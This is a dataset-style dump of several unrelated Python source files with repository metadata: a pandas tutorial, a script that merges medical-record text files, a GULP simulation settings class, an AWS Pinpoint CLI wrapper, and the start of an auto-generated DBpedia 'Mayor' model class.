09efa3e2cc46a870ee131e9c706297c18b8b44e4 | 2db5bf5832ddb99e93bb949ace1fad1fde847319 | /beginLearn/googleclass/class4/pdtest.py | 3b933a6cef80f4c7bb2ba24fc99b874212470863 | [] | no_license | RoderickAdriance/PythonDemo | 2d92b9aa66fcd77b6f797e865df77fbc8c2bcd14 | 98b124fecd3a972d7bc46661c6a7de8787b8e761 | refs/heads/master | 2020-04-06T17:36:46.000133 | 2018-11-15T07:07:03 | 2018-11-15T07:07:03 | 157,666,809 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 711 | py | import pandas as pd
import numpy as np
city_names=pd.Series(['San Francisco', 'San Jose', 'Sacramento'])
population = pd.Series([852469, 1015785, 485199])
cities = pd.DataFrame({'City name': city_names, 'Population': population})
california_housing_dataframe=pd.read_csv('data.csv')
california_housing_dataframe.hist('housing_median_age')
# population=population/1000
#log 实际上不是以10为底,而是以 e 为底
log_population = np.log(population)
apply = population.apply(lambda val: val > 500000)
cities['Area square miles']=pd.Series([46.87, 176.53, 97.92])
cities['Population density']=cities['Population']/cities['Area square miles']
reindex = cities.reindex([0, 5, 2, 8])
print(reindex)
| [
"[email protected]"
] | |
8c6f22eb0df54d68816c89fd47124609cdda6a8b | e3365bc8fa7da2753c248c2b8a5c5e16aef84d9f | /indices/rhinocero.py | 73c56188877d4091cd9bac140d2c91b768e60ab7 | [] | no_license | psdh/WhatsintheVector | e8aabacc054a88b4cb25303548980af9a10c12a8 | a24168d068d9c69dc7a0fd13f606c080ae82e2a6 | refs/heads/master | 2021-01-25T10:34:22.651619 | 2015-09-23T11:54:06 | 2015-09-23T11:54:06 | 42,749,205 | 2 | 3 | null | 2015-09-23T11:54:07 | 2015-09-18T22:06:38 | Python | UTF-8 | Python | false | false | 397 | py | ii = [('LyelCPG2.py', 3), ('RogePAV2.py', 6), ('RogePAV.py', 4), ('RennJIT.py', 3), ('ProuWCM.py', 2), ('PettTHE.py', 1), ('ClarGE2.py', 1), ('CoolWHM.py', 5), ('BuckWGM.py', 22), ('LyelCPG.py', 9), ('WestJIT2.py', 4), ('CrocDNL.py', 1), ('KirbWPW2.py', 11), ('BuckWGM2.py', 3), ('FitzRNS4.py', 10), ('CoolWHM3.py', 1), ('FitzRNS.py', 1), ('FerrSDO.py', 1), ('BellCHM.py', 3), ('LyelCPG3.py', 11)] | [
"[email protected]"
] | |
0a06a2b02ea2ebe7e1e750ff6fcf6079526a4e8e | 53dd5d2cfb79edc87f6c606bbfb7d0bedcf6da61 | /.history/EMR/zhzd_add_20190618132817.py | d0748388e5fbee29a405014068576007a52ae777 | [] | no_license | cyc19950621/python | 4add54894dc81187211aa8d45e5115903b69a182 | d184b83e73334a37d413306d3694e14a19580cb0 | refs/heads/master | 2020-04-11T20:39:34.641303 | 2019-07-02T12:54:49 | 2019-07-02T12:54:49 | 162,078,640 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 766 | py | import time
import math
import os
import sys
import os, os.path,shutil
import codecs
import EMRdef
import re
import pandas as pd
emrtxts = EMRdef.txttq(u'D:\DeepLearning ER\EHRzhzd5')#txt目录提取
emrtxt2s = EMRdef.txttq(u'D:\DeepLearning ER\EHRsex')
ryzd = []
for emrtxt in emrtxts:
f = open(emrtxt,'r',errors="ignore")#中文加入errors
emrpath = os.path.basename(emrtxt)
emrpath = os.path.splitext(emrpath)[0]#提取目录
lines=f.readlines()
for emrtxt2 in emrtxt2s:
f2 = open(emrtxt2,'r',errors="ignore")#中文加入errors
emrpath2 = os.path.basename(emrtxt2)
emrpath2 = os.path.splitext(emrpat2)[0]#提取目录
lines2 = f2.readlines()
if emrpath == emrpath2:
lines.append(lines2) | [
"[email protected]"
] | |
953d8bc38856a27f6a9df03d5819e05e01559c06 | 646b0a41238b96748c7d879dd1bf81858651eb66 | /src/mdt/orm/GulpOpt.py | 177f7a316baa5b0cda918805763bfe60e8fcfac3 | [] | no_license | danse-inelastic/molDynamics | ded0298f8219064e086472299e1383d3dff2dac3 | c8e0bfd9cb65bcfc238e7993b6e7550289d2b219 | refs/heads/master | 2021-01-01T19:42:29.904390 | 2015-05-03T17:27:38 | 2015-05-03T17:27:38 | 34,993,746 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,749 | py | #!/usr/bin/env python
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# J Brandon Keith, Jiao Lin
# California Institute of Technology
# (C) 2006-2011 All Rights Reserved
#
# {LicenseText}
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
from ..GulpOpt import GulpOpt
from Gulp import Gulp
class Inventory(Gulp.Inventory):
optimize_coordinates = Gulp.Inventory.d.bool(name = 'optimize_coordinates', default = True)
optimize_coordinates.label = 'Optimize coordinates?'
optimize_cell = Gulp.Inventory.d.bool(name = 'optimize_cell', default = False)
optimize_cell.label = 'Optimize the cell?'
constraint = Gulp.Inventory.d.str(name = 'constraint', default = 'constant volume')
constraint.label = 'Constraint'
constraint.validator = Gulp.Inventory.v.choice(['None', 'constant volume', 'constant pressure'])
# XXX: see Gulp.py
# trajectoryfile = Gulp.Inventory.d.str(name = 'trajectoryfile', default = 'gulp.his')
# trajectoryfile.label = 'Trajectory Filename'
# restartfile = Gulp.Inventory.d.str(name = 'restartfile', default = 'gulp.res')
# restartfile.label = 'Restart Filename'
GulpOpt.Inventory = Inventory
def customizeLubanObjectDrawer(self, drawer):
drawer.sequence = ['properties', 'forcefield']
drawer.mold.sequence = [
'optimize_coordinates',
'optimize_cell',
'constraint',
'temperature', 'pressure',
'identify_molecules',
'assign_bonds_from_initial_geometry',
'calc_dispersion_in_recip_space',
]
return
GulpOpt.customizeLubanObjectDrawer = customizeLubanObjectDrawer
| [
"[email protected]"
] | |
01b65fa62f033ee2bb173040766119fcba0b4fe2 | 91d1a6968b90d9d461e9a2ece12b465486e3ccc2 | /pinpoint_write_2/endpoint_delete.py | cf53331aefddda4f6a700adcbf0325709acdb957 | [] | no_license | lxtxl/aws_cli | c31fc994c9a4296d6bac851e680d5adbf7e93481 | aaf35df1b7509abf5601d3f09ff1fece482facda | refs/heads/master | 2023-02-06T09:00:33.088379 | 2020-12-27T13:38:45 | 2020-12-27T13:38:45 | 318,686,394 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,101 | py | #!/usr/bin/python
# -*- codding: utf-8 -*-
import os
import sys
sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))
from common.execute_command import write_two_parameter
# url : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/pinpoint/delete-endpoint.html
if __name__ == '__main__':
"""
get-endpoint : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/pinpoint/get-endpoint.html
update-endpoint : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/pinpoint/update-endpoint.html
"""
parameter_display_string = """
# application-id : The unique identifier for the application. This identifier is displayed as the Project ID on the Amazon Pinpoint console.
# endpoint-id : The unique identifier for the endpoint.
"""
add_option_dict = {}
add_option_dict["parameter_display_string"] = parameter_display_string
# ex: add_option_dict["no_value_parameter_list"] = "--single-parameter"
write_two_parameter("pinpoint", "delete-endpoint", "application-id", "endpoint-id", add_option_dict)
| [
"[email protected]"
] | |
702d222428773d4309d41c11af3522790b2d2bc0 | 59166105545cdd87626d15bf42e60a9ee1ef2413 | /dbpedia/models/mayor.py | 6526d40de4f17f276f8ee52b9b8af54cfc7af7e8 | [] | no_license | mosoriob/dbpedia_api_client | 8c594fc115ce75235315e890d55fbf6bd555fa85 | 8d6f0d04a3a30a82ce0e9277e4c9ce00ecd0c0cc | refs/heads/master | 2022-11-20T01:42:33.481024 | 2020-05-12T23:22:54 | 2020-05-12T23:22:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 233,338 | py | # coding: utf-8
"""
DBpedia
This is the API of the DBpedia Ontology # noqa: E501
The version of the OpenAPI document: v0.0.1
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from dbpedia.configuration import Configuration
class Mayor(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'parent': 'list[object]',
'viaf_id': 'list[str]',
'competition_title': 'list[object]',
'art_patron': 'list[object]',
'hair_colour': 'list[str]',
'tv_show': 'list[object]',
'expedition': 'list[str]',
'main_domain': 'list[object]',
'nndb_id': 'list[str]',
'discipline': 'list[object]',
'consecration': 'list[str]',
'salary': 'list[float]',
'birth_name': 'list[str]',
'spouse': 'list[object]',
'scene': 'list[str]',
'best_lap': 'list[str]',
'shoe_number': 'list[int]',
'mayor_mandate': 'list[str]',
'friend': 'list[object]',
'full_score': 'list[str]',
'diploma': 'list[object]',
'active_years_end_year_mgr': 'list[str]',
'abbeychurch_blessing': 'list[str]',
'height': 'list[object]',
'usopen_wins': 'list[object]',
'bust_size': 'list[float]',
'cloth_size': 'list[str]',
'handedness': 'list[object]',
'philosophical_school': 'list[object]',
'parliamentary_group': 'list[str]',
'date_of_burial': 'list[str]',
'mount': 'list[str]',
'olympic_games_silver': 'list[int]',
'nationality': 'list[object]',
'junior_years_start_year': 'list[str]',
'relative': 'list[object]',
'newspaper': 'list[object]',
'announced_from': 'list[object]',
'military_branch': 'list[object]',
'activity': 'list[object]',
'ethnicity': 'list[object]',
'state_of_origin': 'list[object]',
'pole_position': 'list[int]',
'season_manager': 'list[str]',
'killed_by': 'list[str]',
'blood_type': 'list[object]',
'continental_tournament': 'list[object]',
'junior_years_end_year': 'list[str]',
'political_function': 'list[str]',
'honours': 'list[object]',
'olympic_games': 'list[object]',
'hair_color': 'list[object]',
'foot': 'list[str]',
'measurements': 'list[str]',
'hand': 'list[object]',
'federation': 'list[object]',
'circumcised': 'list[str]',
'penis_length': 'list[str]',
'coemperor': 'list[object]',
'detractor': 'list[object]',
'selibr_id': 'list[str]',
'danse_competition': 'list[str]',
'sex': 'list[str]',
'sexual_orientation': 'list[object]',
'partner': 'list[object]',
'birth_year': 'list[str]',
'sports_function': 'list[str]',
'orcid_id': 'list[str]',
'election_date': 'list[str]',
'sport_discipline': 'list[object]',
'collaboration': 'list[object]',
'national_team_year': 'list[str]',
'number_of_run': 'list[int]',
'spouse_name': 'list[str]',
'lah_hof': 'list[str]',
'derived_word': 'list[str]',
'current_team_manager': 'list[object]',
'little_pool_record': 'list[str]',
'bpn_id': 'list[str]',
'free_danse_score': 'list[str]',
'project': 'list[object]',
'active_years': 'list[object]',
'title_date': 'list[str]',
'blood_group': 'list[str]',
'school': 'list[object]',
'death_place': 'list[object]',
'victory_percentage_as_mgr': 'list[float]',
'imposed_danse_competition': 'list[str]',
'shoot': 'list[str]',
'education_place': 'list[object]',
'match_point': 'list[str]',
'reign_name': 'list[str]',
'pro_period': 'list[str]',
'influenced_by': 'list[object]',
'nla_id': 'list[str]',
'cousurper': 'list[object]',
'race_wins': 'list[int]',
'world_tournament_bronze': 'list[int]',
'jutsu': 'list[str]',
'weight': 'list[object]',
'other_media': 'list[object]',
'alma_mater': 'list[object]',
'imposed_danse_score': 'list[str]',
'known_for': 'list[object]',
'big_pool_record': 'list[str]',
'olympic_games_wins': 'list[str]',
'eye_colour': 'list[str]',
'world_tournament_silver': 'list[int]',
'architectural_movement': 'list[str]',
'mood': 'list[str]',
'bibsys_id': 'list[str]',
'iihf_hof': 'list[str]',
'free_prog_score': 'list[str]',
'description': 'list[str]',
'particular_sign': 'list[str]',
'league_manager': 'list[object]',
'junior_season': 'list[object]',
'free_prog_competition': 'list[str]',
'weapon': 'list[object]',
'kind_of_criminal': 'list[str]',
'notable_idea': 'list[object]',
'player_status': 'list[str]',
'other_function': 'list[object]',
'continental_tournament_silver': 'list[int]',
'career_station': 'list[object]',
'resting_place_position': 'list[object]',
'original_danse_competition': 'list[str]',
'status_manager': 'list[str]',
'national_tournament': 'list[object]',
'hometown': 'list[object]',
'dead_in_fight_place': 'list[str]',
'continental_tournament_bronze': 'list[int]',
'victory': 'list[int]',
'complexion': 'list[object]',
'citizenship': 'list[object]',
'start': 'list[int]',
'tessitura': 'list[str]',
'start_career': 'list[str]',
'label': 'list[str]',
'birth_date': 'list[str]',
'national_tournament_silver': 'list[int]',
'other_activity': 'list[str]',
'linguistics_tradition': 'list[object]',
'national_tournament_bronze': 'list[int]',
'escalafon': 'list[str]',
'sibling': 'list[object]',
'waist_size': 'list[float]',
'olympic_games_gold': 'list[int]',
'general_council': 'list[object]',
'arrest_date': 'list[str]',
'team_manager': 'list[object]',
'birth_sign': 'list[object]',
'artistic_function': 'list[str]',
'age': 'list[int]',
'college': 'list[object]',
'education': 'list[object]',
'movie': 'list[object]',
'achievement': 'list[object]',
'death_age': 'list[int]',
'type': 'list[str]',
'approach': 'list[object]',
'relation': 'list[object]',
'victory_as_mgr': 'list[int]',
'living_place': 'list[object]',
'copilote': 'list[object]',
'season': 'list[object]',
'start_wct': 'list[str]',
'catch': 'list[str]',
'id': 'str',
'feat': 'list[str]',
'decoration': 'list[object]',
'case': 'list[str]',
'sentence': 'list[str]',
'profession': 'list[object]',
'retirement_date': 'list[str]',
'world_tournament': 'list[object]',
'wife': 'list[object]',
'allegiance': 'list[str]',
'active_years_start_date_mgr': 'list[str]',
'lccn_id': 'list[str]',
'tattoo': 'list[str]',
'british_wins': 'list[object]',
'hip_size': 'list[float]',
'podium': 'list[int]',
'seiyu': 'list[object]',
'player_season': 'list[object]',
'short_prog_score': 'list[str]',
'regional_council': 'list[object]',
'homage': 'list[str]',
'shoe_size': 'list[str]',
'signature': 'list[str]',
'olympic_games_bronze': 'list[int]',
'danse_score': 'list[str]',
'id_number': 'list[int]',
'short_prog_competition': 'list[str]',
'active_years_start_year_mgr': 'list[str]',
'wedding_parents_date': 'list[str]',
'birth_place': 'list[object]',
'world': 'list[object]',
'astrological_sign': 'list[object]',
'eye_color': 'list[object]',
'networth': 'list[float]',
'coalition': 'list[str]',
'national_team_match_point': 'list[str]',
'national_selection': 'list[object]',
'agency': 'list[object]',
'start_wqs': 'list[str]',
'defeat_as_mgr': 'list[int]',
'death_year': 'list[str]',
'world_tournament_gold': 'list[int]',
'pga_wins': 'list[object]',
'board': 'list[object]',
'rid_id': 'list[str]',
'dead_in_fight_date': 'list[str]',
'related_functions': 'list[object]',
'manager_season': 'list[object]',
'reign': 'list[str]',
'second': 'list[int]',
'radio': 'list[object]',
'full_competition': 'list[str]',
'free_score_competition': 'list[str]',
'prefect': 'list[object]',
'publication': 'list[str]',
'opponent': 'list[object]',
'employer': 'list[object]',
'affair': 'list[str]',
'body_discovered': 'list[object]',
'buried_place': 'list[object]',
'residence': 'list[object]',
'usurper': 'list[object]',
'other_occupation': 'list[object]',
'contest': 'list[object]',
'active_years_end_date_mgr': 'list[str]',
'created': 'list[object]',
'original_danse_score': 'list[str]',
'end_career': 'list[str]',
'note_on_resting_place': 'list[str]',
'army': 'list[str]',
'active_year': 'list[str]',
'person_function': 'list[object]',
'pro_since': 'list[str]',
'cause_of_death': 'list[str]',
'dubber': 'list[object]',
'non_professional_career': 'list[str]',
'military_function': 'list[str]',
'patent': 'list[object]',
'creation_christian_bishop': 'list[str]',
'piercing': 'list[str]',
'student': 'list[object]',
'bad_guy': 'list[str]',
'influenced': 'list[object]',
'start_reign': 'list[object]',
'university': 'list[object]',
'gym_apparatus': 'list[object]',
'ideology': 'list[object]',
'conviction_date': 'list[str]',
'media': 'list[object]',
'bnf_id': 'list[str]',
'pseudonym': 'list[str]',
'temple_year': 'list[str]',
'clothing_size': 'list[str]',
'speciality': 'list[str]',
'award': 'list[object]',
'kind_of_criminal_action': 'list[str]',
'isni_id': 'list[str]',
'significant_project': 'list[object]',
'leadership': 'list[str]',
'death_date': 'list[str]',
'special_trial': 'list[int]',
'resting_date': 'list[str]',
'victim': 'list[str]',
'has_natural_bust': 'list[str]',
'masters_wins': 'list[object]',
'individualised_pnd': 'list[int]',
'continental_tournament_gold': 'list[int]',
'orientation': 'list[str]',
'grave': 'list[str]',
'resting_place': 'list[object]',
'abbeychurch_blessing_charge': 'list[str]',
'handisport': 'list[str]',
'external_ornament': 'list[str]',
'third': 'list[int]',
'film_number': 'list[int]',
'temple': 'list[str]',
'end_reign': 'list[object]',
'national_tournament_gold': 'list[int]',
'death_cause': 'list[object]'
}
attribute_map = {
'parent': 'parent',
'viaf_id': 'viafId',
'competition_title': 'competitionTitle',
'art_patron': 'artPatron',
'hair_colour': 'hairColour',
'tv_show': 'tvShow',
'expedition': 'expedition',
'main_domain': 'mainDomain',
'nndb_id': 'nndbId',
'discipline': 'discipline',
'consecration': 'consecration',
'salary': 'salary',
'birth_name': 'birthName',
'spouse': 'spouse',
'scene': 'scene',
'best_lap': 'bestLap',
'shoe_number': 'shoeNumber',
'mayor_mandate': 'mayorMandate',
'friend': 'friend',
'full_score': 'fullScore',
'diploma': 'diploma',
'active_years_end_year_mgr': 'activeYearsEndYearMgr',
'abbeychurch_blessing': 'abbeychurchBlessing',
'height': 'height',
'usopen_wins': 'usopenWins',
'bust_size': 'bustSize',
'cloth_size': 'clothSize',
'handedness': 'handedness',
'philosophical_school': 'philosophicalSchool',
'parliamentary_group': 'parliamentaryGroup',
'date_of_burial': 'dateOfBurial',
'mount': 'mount',
'olympic_games_silver': 'olympicGamesSilver',
'nationality': 'nationality',
'junior_years_start_year': 'juniorYearsStartYear',
'relative': 'relative',
'newspaper': 'newspaper',
'announced_from': 'announcedFrom',
'military_branch': 'militaryBranch',
'activity': 'activity',
'ethnicity': 'ethnicity',
'state_of_origin': 'stateOfOrigin',
'pole_position': 'polePosition',
'season_manager': 'seasonManager',
'killed_by': 'killedBy',
'blood_type': 'bloodType',
'continental_tournament': 'continentalTournament',
'junior_years_end_year': 'juniorYearsEndYear',
'political_function': 'politicalFunction',
'honours': 'honours',
'olympic_games': 'olympicGames',
'hair_color': 'hairColor',
'foot': 'foot',
'measurements': 'measurements',
'hand': 'hand',
'federation': 'federation',
'circumcised': 'circumcised',
'penis_length': 'penisLength',
'coemperor': 'coemperor',
'detractor': 'detractor',
'selibr_id': 'selibrId',
'danse_competition': 'danseCompetition',
'sex': 'sex',
'sexual_orientation': 'sexualOrientation',
'partner': 'partner',
'birth_year': 'birthYear',
'sports_function': 'sportsFunction',
'orcid_id': 'orcidId',
'election_date': 'electionDate',
'sport_discipline': 'sportDiscipline',
'collaboration': 'collaboration',
'national_team_year': 'nationalTeamYear',
'number_of_run': 'numberOfRun',
'spouse_name': 'spouseName',
'lah_hof': 'lahHof',
'derived_word': 'derivedWord',
'current_team_manager': 'currentTeamManager',
'little_pool_record': 'littlePoolRecord',
'bpn_id': 'bpnId',
'free_danse_score': 'freeDanseScore',
'project': 'project',
'active_years': 'activeYears',
'title_date': 'titleDate',
'blood_group': 'bloodGroup',
'school': 'school',
'death_place': 'deathPlace',
'victory_percentage_as_mgr': 'victoryPercentageAsMgr',
'imposed_danse_competition': 'imposedDanseCompetition',
'shoot': 'shoot',
'education_place': 'educationPlace',
'match_point': 'matchPoint',
'reign_name': 'reignName',
'pro_period': 'proPeriod',
'influenced_by': 'influencedBy',
'nla_id': 'nlaId',
'cousurper': 'cousurper',
'race_wins': 'raceWins',
'world_tournament_bronze': 'worldTournamentBronze',
'jutsu': 'jutsu',
'weight': 'weight',
'other_media': 'otherMedia',
'alma_mater': 'almaMater',
'imposed_danse_score': 'imposedDanseScore',
'known_for': 'knownFor',
'big_pool_record': 'bigPoolRecord',
'olympic_games_wins': 'olympicGamesWins',
'eye_colour': 'eyeColour',
'world_tournament_silver': 'worldTournamentSilver',
'architectural_movement': 'architecturalMovement',
'mood': 'mood',
'bibsys_id': 'bibsysId',
'iihf_hof': 'iihfHof',
'free_prog_score': 'freeProgScore',
'description': 'description',
'particular_sign': 'particularSign',
'league_manager': 'leagueManager',
'junior_season': 'juniorSeason',
'free_prog_competition': 'freeProgCompetition',
'weapon': 'weapon',
'kind_of_criminal': 'kindOfCriminal',
'notable_idea': 'notableIdea',
'player_status': 'playerStatus',
'other_function': 'otherFunction',
'continental_tournament_silver': 'continentalTournamentSilver',
'career_station': 'careerStation',
'resting_place_position': 'restingPlacePosition',
'original_danse_competition': 'originalDanseCompetition',
'status_manager': 'statusManager',
'national_tournament': 'nationalTournament',
'hometown': 'hometown',
'dead_in_fight_place': 'deadInFightPlace',
'continental_tournament_bronze': 'continentalTournamentBronze',
'victory': 'victory',
'complexion': 'complexion',
'citizenship': 'citizenship',
'start': 'start',
'tessitura': 'tessitura',
'start_career': 'startCareer',
'label': 'label',
'birth_date': 'birthDate',
'national_tournament_silver': 'nationalTournamentSilver',
'other_activity': 'otherActivity',
'linguistics_tradition': 'linguisticsTradition',
'national_tournament_bronze': 'nationalTournamentBronze',
'escalafon': 'escalafon',
'sibling': 'sibling',
'waist_size': 'waistSize',
'olympic_games_gold': 'olympicGamesGold',
'general_council': 'generalCouncil',
'arrest_date': 'arrestDate',
'team_manager': 'teamManager',
'birth_sign': 'birthSign',
'artistic_function': 'artisticFunction',
'age': 'age',
'college': 'college',
'education': 'education',
'movie': 'movie',
'achievement': 'achievement',
'death_age': 'deathAge',
'type': 'type',
'approach': 'approach',
'relation': 'relation',
'victory_as_mgr': 'victoryAsMgr',
'living_place': 'livingPlace',
'copilote': 'copilote',
'season': 'season',
'start_wct': 'startWct',
'catch': 'catch',
'id': 'id',
'feat': 'feat',
'decoration': 'decoration',
'case': 'case',
'sentence': 'sentence',
'profession': 'profession',
'retirement_date': 'retirementDate',
'world_tournament': 'worldTournament',
'wife': 'wife',
'allegiance': 'allegiance',
'active_years_start_date_mgr': 'activeYearsStartDateMgr',
'lccn_id': 'lccnId',
'tattoo': 'tattoo',
'british_wins': 'britishWins',
'hip_size': 'hipSize',
'podium': 'podium',
'seiyu': 'seiyu',
'player_season': 'playerSeason',
'short_prog_score': 'shortProgScore',
'regional_council': 'regionalCouncil',
'homage': 'homage',
'shoe_size': 'shoeSize',
'signature': 'signature',
'olympic_games_bronze': 'olympicGamesBronze',
'danse_score': 'danseScore',
'id_number': 'idNumber',
'short_prog_competition': 'shortProgCompetition',
'active_years_start_year_mgr': 'activeYearsStartYearMgr',
'wedding_parents_date': 'weddingParentsDate',
'birth_place': 'birthPlace',
'world': 'world',
'astrological_sign': 'astrologicalSign',
'eye_color': 'eyeColor',
'networth': 'networth',
'coalition': 'coalition',
'national_team_match_point': 'nationalTeamMatchPoint',
'national_selection': 'nationalSelection',
'agency': 'agency',
'start_wqs': 'startWqs',
'defeat_as_mgr': 'defeatAsMgr',
'death_year': 'deathYear',
'world_tournament_gold': 'worldTournamentGold',
'pga_wins': 'pgaWins',
'board': 'board',
'rid_id': 'ridId',
'dead_in_fight_date': 'deadInFightDate',
'related_functions': 'relatedFunctions',
'manager_season': 'managerSeason',
'reign': 'reign',
'second': 'second',
'radio': 'radio',
'full_competition': 'fullCompetition',
'free_score_competition': 'freeScoreCompetition',
'prefect': 'prefect',
'publication': 'publication',
'opponent': 'opponent',
'employer': 'employer',
'affair': 'affair',
'body_discovered': 'bodyDiscovered',
'buried_place': 'buriedPlace',
'residence': 'residence',
'usurper': 'usurper',
'other_occupation': 'otherOccupation',
'contest': 'contest',
'active_years_end_date_mgr': 'activeYearsEndDateMgr',
'created': 'created',
'original_danse_score': 'originalDanseScore',
'end_career': 'endCareer',
'note_on_resting_place': 'noteOnRestingPlace',
'army': 'army',
'active_year': 'activeYear',
'person_function': 'personFunction',
'pro_since': 'proSince',
'cause_of_death': 'causeOfDeath',
'dubber': 'dubber',
'non_professional_career': 'nonProfessionalCareer',
'military_function': 'militaryFunction',
'patent': 'patent',
'creation_christian_bishop': 'creationChristianBishop',
'piercing': 'piercing',
'student': 'student',
'bad_guy': 'badGuy',
'influenced': 'influenced',
'start_reign': 'startReign',
'university': 'university',
'gym_apparatus': 'gymApparatus',
'ideology': 'ideology',
'conviction_date': 'convictionDate',
'media': 'media',
'bnf_id': 'bnfId',
'pseudonym': 'pseudonym',
'temple_year': 'templeYear',
'clothing_size': 'clothingSize',
'speciality': 'speciality',
'award': 'award',
'kind_of_criminal_action': 'kindOfCriminalAction',
'isni_id': 'isniId',
'significant_project': 'significantProject',
'leadership': 'leadership',
'death_date': 'deathDate',
'special_trial': 'specialTrial',
'resting_date': 'restingDate',
'victim': 'victim',
'has_natural_bust': 'hasNaturalBust',
'masters_wins': 'mastersWins',
'individualised_pnd': 'individualisedPnd',
'continental_tournament_gold': 'continentalTournamentGold',
'orientation': 'orientation',
'grave': 'grave',
'resting_place': 'restingPlace',
'abbeychurch_blessing_charge': 'abbeychurchBlessingCharge',
'handisport': 'handisport',
'external_ornament': 'externalOrnament',
'third': 'third',
'film_number': 'filmNumber',
'temple': 'temple',
'end_reign': 'endReign',
'national_tournament_gold': 'nationalTournamentGold',
'death_cause': 'deathCause'
}
def __init__(self, parent=None, viaf_id=None, competition_title=None, art_patron=None, hair_colour=None, tv_show=None, expedition=None, main_domain=None, nndb_id=None, discipline=None, consecration=None, salary=None, birth_name=None, spouse=None, scene=None, best_lap=None, shoe_number=None, mayor_mandate=None, friend=None, full_score=None, diploma=None, active_years_end_year_mgr=None, abbeychurch_blessing=None, height=None, usopen_wins=None, bust_size=None, cloth_size=None, handedness=None, philosophical_school=None, parliamentary_group=None, date_of_burial=None, mount=None, olympic_games_silver=None, nationality=None, junior_years_start_year=None, relative=None, newspaper=None, announced_from=None, military_branch=None, activity=None, ethnicity=None, state_of_origin=None, pole_position=None, season_manager=None, killed_by=None, blood_type=None, continental_tournament=None, junior_years_end_year=None, political_function=None, honours=None, olympic_games=None, hair_color=None, foot=None, measurements=None, hand=None, federation=None, circumcised=None, penis_length=None, coemperor=None, detractor=None, selibr_id=None, danse_competition=None, sex=None, sexual_orientation=None, partner=None, birth_year=None, sports_function=None, orcid_id=None, election_date=None, sport_discipline=None, collaboration=None, national_team_year=None, number_of_run=None, spouse_name=None, lah_hof=None, derived_word=None, current_team_manager=None, little_pool_record=None, bpn_id=None, free_danse_score=None, project=None, active_years=None, title_date=None, blood_group=None, school=None, death_place=None, victory_percentage_as_mgr=None, imposed_danse_competition=None, shoot=None, education_place=None, match_point=None, reign_name=None, pro_period=None, influenced_by=None, nla_id=None, cousurper=None, race_wins=None, world_tournament_bronze=None, jutsu=None, weight=None, other_media=None, alma_mater=None, imposed_danse_score=None, known_for=None, big_pool_record=None, 
olympic_games_wins=None, eye_colour=None, world_tournament_silver=None, architectural_movement=None, mood=None, bibsys_id=None, iihf_hof=None, free_prog_score=None, description=None, particular_sign=None, league_manager=None, junior_season=None, free_prog_competition=None, weapon=None, kind_of_criminal=None, notable_idea=None, player_status=None, other_function=None, continental_tournament_silver=None, career_station=None, resting_place_position=None, original_danse_competition=None, status_manager=None, national_tournament=None, hometown=None, dead_in_fight_place=None, continental_tournament_bronze=None, victory=None, complexion=None, citizenship=None, start=None, tessitura=None, start_career=None, label=None, birth_date=None, national_tournament_silver=None, other_activity=None, linguistics_tradition=None, national_tournament_bronze=None, escalafon=None, sibling=None, waist_size=None, olympic_games_gold=None, general_council=None, arrest_date=None, team_manager=None, birth_sign=None, artistic_function=None, age=None, college=None, education=None, movie=None, achievement=None, death_age=None, type=None, approach=None, relation=None, victory_as_mgr=None, living_place=None, copilote=None, season=None, start_wct=None, catch=None, id=None, feat=None, decoration=None, case=None, sentence=None, profession=None, retirement_date=None, world_tournament=None, wife=None, allegiance=None, active_years_start_date_mgr=None, lccn_id=None, tattoo=None, british_wins=None, hip_size=None, podium=None, seiyu=None, player_season=None, short_prog_score=None, regional_council=None, homage=None, shoe_size=None, signature=None, olympic_games_bronze=None, danse_score=None, id_number=None, short_prog_competition=None, active_years_start_year_mgr=None, wedding_parents_date=None, birth_place=None, world=None, astrological_sign=None, eye_color=None, networth=None, coalition=None, national_team_match_point=None, national_selection=None, agency=None, start_wqs=None, defeat_as_mgr=None, 
death_year=None, world_tournament_gold=None, pga_wins=None, board=None, rid_id=None, dead_in_fight_date=None, related_functions=None, manager_season=None, reign=None, second=None, radio=None, full_competition=None, free_score_competition=None, prefect=None, publication=None, opponent=None, employer=None, affair=None, body_discovered=None, buried_place=None, residence=None, usurper=None, other_occupation=None, contest=None, active_years_end_date_mgr=None, created=None, original_danse_score=None, end_career=None, note_on_resting_place=None, army=None, active_year=None, person_function=None, pro_since=None, cause_of_death=None, dubber=None, non_professional_career=None, military_function=None, patent=None, creation_christian_bishop=None, piercing=None, student=None, bad_guy=None, influenced=None, start_reign=None, university=None, gym_apparatus=None, ideology=None, conviction_date=None, media=None, bnf_id=None, pseudonym=None, temple_year=None, clothing_size=None, speciality=None, award=None, kind_of_criminal_action=None, isni_id=None, significant_project=None, leadership=None, death_date=None, special_trial=None, resting_date=None, victim=None, has_natural_bust=None, masters_wins=None, individualised_pnd=None, continental_tournament_gold=None, orientation=None, grave=None, resting_place=None, abbeychurch_blessing_charge=None, handisport=None, external_ornament=None, third=None, film_number=None, temple=None, end_reign=None, national_tournament_gold=None, death_cause=None, local_vars_configuration=None): # noqa: E501
"""Mayor - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._parent = None
self._viaf_id = None
self._competition_title = None
self._art_patron = None
self._hair_colour = None
self._tv_show = None
self._expedition = None
self._main_domain = None
self._nndb_id = None
self._discipline = None
self._consecration = None
self._salary = None
self._birth_name = None
self._spouse = None
